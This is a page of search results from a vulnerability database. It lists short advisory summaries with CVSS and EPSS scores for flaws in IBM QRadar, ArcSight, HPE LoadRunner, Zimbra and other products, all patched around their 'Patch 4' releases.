
70 matches found

CVE
added 2019/11/09 1:41 a.m., 173 views

CVE-2019-4454

CVE-2019-4454 affects IBM QRadar SIEM versions 7.3.0–7.3.2 Patch 4. The vulnerability is a cross-site scripting (XSS) issue in the Web UI that can allow an attacker to embed arbitrary JavaScript, potentially leading to credentials disclosure within a trusted session. Affected product/component: I...

CVSS 5.4, AI score 5.2, EPSS 0.00239
Exploits 0, References 2, Affected Software 1

Saint
added 2019/06/06 12:0 a.m., 263 views

Zimbra Collaboration Suite ProxyServlet Server Side Request Forgery

Added: 06/06/2019. CVE: CVE-2019-9621. Background: Zimbra Collaboration Suite is an email, calendar, and collaboration solution for enterprises. Problem: The ProxyServlet component allows a remote attacker to upload arbitrary files, which can then be executed, using XML External Entity injection and...

CVSS 7.5, AI score 8, EPSS 0.94113
Exploits 10

IBM Security Bulletins
added 2018/10/04 2:0 a.m., 21 views

Security Bulletin: IBM QRadar SIEM is vulnerable to OS Command Injection (CVE-2018-1571) (Updated 9/12/2018)

Summary: User-supplied data may be passed to a system shell. Attackers could execute arbitrary commands on the system. Vulnerability Details: CVEID: CVE-2018-1571. Description: IBM QRadar could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a...

CVSS 9, AI score 1.9, EPSS 0.03535
Exploits 0, Affected Software 1

Packet Storm
added 2018/08/31 12:0 a.m., 42 views

Episerver 7 Patch 4 XML Injection


AI score 0.2
Exploits 0

IBM Security Bulletins
added 2018/08/15 4:21 p.m., 36 views

Security Bulletin: IBM QRadar SIEM has released 7.3.1 Patch 4, and 7.2.8 Patch 13 in response to the vulnerabilities known as Spectre and Meltdown.

Summary: IBM has released the following 7.3.1 Patch 4, and 7.2.8 Patch 13 for IBM QRadar SIEM in response to CVE-2017-5753, CVE-2017-5715 and CVE-2017-5754. Vulnerability Details: CVEID: CVE-2017-5753; CVEID: CVE-2017-5715; CVEID: CVE-2017-5754. Affected Products and Versions: IBM QRadar SIEM 7.3.0 –...

CVSS 5.6, AI score 2.9, EPSS 0.9427
Exploits 12, Affected Software 1

seebug.org
added 2018/08/08 12:0 a.m., 605 views

OpenEMR < 5.0.1 - Remote Code Execution


Exploits 0

IBM Security Bulletins
added 2018/06/16 10:2 p.m., 26 views

Security Bulletin: Open Source XStream as used in IBM QRadar SIEM is vulnerable to Denial of Service. (CVE-2017-7957)

Summary: Open Source XStream is vulnerable to a Denial of Service attack. Vulnerability Details: CVEID: CVE-2017-7957. DESCRIPTION: XStream is vulnerable to a denial of service, caused by the improper handling of attempts to create an instance of the primitive type 'void' during unmarshalling. A...

CVSS 7.5, AI score 1.7, EPSS 0.02639
Exploits 0, Affected Software 1

IBM Security Bulletins
added 2018/06/16 9:50 p.m., 18 views

Security Bulletin: IBM QRadar Incident Forensics is vulnerable to overly permissive CORS access policies (CVE-2016-9725)

Summary: IBM QRadar Incident Forensics is affected by Cross-Origin Resource Sharing (CORS), which is a mechanism that allows web sites to request resources from external sites, avoiding the need to duplicate them. Vulnerability Details: CVEID: CVE-2016-9725. DESCRIPTION: IBM QRadar Incident Forensics...

CVSS 5.3, AI score 1, EPSS 0.00213
Exploits 0, Affected Software 1

IBM Security Bulletins
added 2018/06/16 9:50 p.m., 20 views

Security Bulletin: IBM QRadar SIEM and QRadar Incident Forensics are vulnerable to information exposure (CVE-2016-9720)

Summary: IBM QRadar SIEM and Incident Forensics disclose sensitive information to unauthorized users. The information can be used to mount further attacks on the system. Vulnerability Details: CVEID: CVE-2016-9720. DESCRIPTION: IBM QRadar discloses sensitive information to unauthorized users. The...

CVSS 5.3, AI score 1.6, EPSS 0.00213
Exploits 0, Affected Software 1

IBM Security Bulletins
added 2018/06/16 9:50 p.m., 73 views

Security Bulletin: Apache Tomcat as used in IBM QRadar SIEM is vulnerable to various CVE's

Summary: Apache Tomcat prior to version 6.0.48 is susceptible to several vulnerabilities. Vulnerability Details: CVEID: CVE-2016-0762. DESCRIPTION: Apache Tomcat could allow a remote attacker to obtain sensitive information, caused by the failure to process the user supplied password if the specifie...

CVSS 9.1, AI score 0.5, EPSS 0.0326
Exploits 10, Affected Software 1

IBM Security Bulletins
added 2018/06/16 9:50 p.m., 35 views

Security Bulletin: IBM Java as used in IBM QRadar SIEM and Incident Forensics is vulnerable to various CVE's

Summary: IBM QRadar SIEM and Incident Forensics are vulnerable to various CVE's found in IBM Java. Vulnerability Details: CVEID: CVE-2016-5597. DESCRIPTION: An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the Networking component could allow a remote attacker to obtai...

CVSS 5.9, AI score 1.1, EPSS 0.01511
Exploits 0, Affected Software 1

IBM Security Bulletins
added 2018/06/16 9:50 p.m., 46 views

Security Bulletin: Pivotal Spring Framework as used in IBM QRadar SIEM is vulnerable to various CVE's

Summary: OpenSource Pivotal Spring Framework as used in IBM QRadar is susceptible to several vulnerabilities. Vulnerability Details: CVEID: CVE-2013-7315. DESCRIPTION: Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection X...

CVSS 6.8, AI score 1.1, EPSS 0.50413
Exploits 7, Affected Software 1

Tenable Nessus
added 2017/11/03 12:0 a.m., 65 views

HP ArcSight ESM 6.x < 6.9.1.2377.4 / 6.11.0.2385.1 Multiple Vulnerabilities

According to its self-reported version number, the version of HP ArcSight Enterprise Security Manager (ESM) installed on the remote host is 6.x prior to 6.9.1c Patch 4 or 6.11.0 Patch 1. It is, therefore, affected by multiple vulnerabilities. See advisory for details. (C) Tenable Network Security, In...

CVSS 9.8, AI score 6.4, EPSS 0.00527
Exploits 0, References 13

NVD
added 2017/09/30 1:29 a.m., 10 views

CVE-2017-13991

An information leakage vulnerability in ArcSight ESM and ArcSight ESM Express, any 6.x version prior to 6.9.1c Patch 4 or 6.11.0 Patch 1, allows disclosure of product license features...

CVSS 5.3, AI score 6.2, EPSS 0.00406
Exploits 0, References 2

Prion
added 2017/09/30 1:29 a.m., 9 views

Cross site scripting

A reflected Cross-Site Scripting (XSS) vulnerability in ArcSight ESM and ArcSight ESM Express, any 6.x version prior to 6.9.1c Patch 4 or 6.11.0 Patch 1, allows for unintended information when a specific URL is sent to the system...

CVSS 4.3, AI score 6.1, EPSS 0.00362
Exploits 0, References 2, Affected Software 2

OpenVAS
added 2017/04/25 12:0 a.m., 18 views

HPE LoadRunner 'libxdrutil.dll mxdr_string method' RCE Vulnerability

HPE LoadRunner is prone to a remote code execution (RCE) vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only. CPE =...

CVSS 9.8, AI score 9.9, EPSS 0.33852
Exploits 0, References 3

Tenable Nessus
added 2017/03/22 12:0 a.m., 111 views

HPE LoadRunner < 12.53 Patch 4 libxdrutil.dll mxdr_string() RCE

The version of HP LoadRunner installed on the remote Windows host is prior to 12.53 Patch 4. It is, therefore, affected by a remote code execution vulnerability due to a heap-based buffer overflow condition in the mxdr_string() function in libxdrutil.dll. An unauthenticated, remote attacker can...

CVSS 9.8, AI score 9.2, EPSS 0.33852
Exploits 0, References 4

Tenable Nessus
added 2017/03/22 12:0 a.m., 34 views

HP Performance Center < 12.53 Patch 4 libxdrutil.dll mxdr_string() RCE

The version of HP Performance Center installed on the remote Windows host is prior to 12.53 Patch 4. It is, therefore, affected by a remote code execution vulnerability due to a heap-based buffer overflow condition in the mxdr_string() function in libxdrutil.dll. An unauthenticated, remote attacker...

CVSS 9.8, AI score 8.9, EPSS 0.33852
Exploits 0, References 3

NVD
added 2016/04/07 11:59 p.m., 23 views

CVE-2016-2789

Cross-site scripting (XSS) vulnerability in the Web User Interface in Citrix XenMobile Server 10.0, 10.1 before Rolling Patch 4, and 10.3 before Rolling Patch 1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...

CVSS 6.1, AI score 6, EPSS 0.00279
Exploits 0, References 2

Cvelist
added 2016/03/18 10:0 a.m., 17 views

CVE-2015-5968

Cross-site scripting (XSS) vulnerability in Novell Filr 1.2 before Hot Patch 4 allows remote attackers to inject arbitrary web script or HTML via a crafted URL...

AI score 6, EPSS 0.00241
Exploits 0, References 1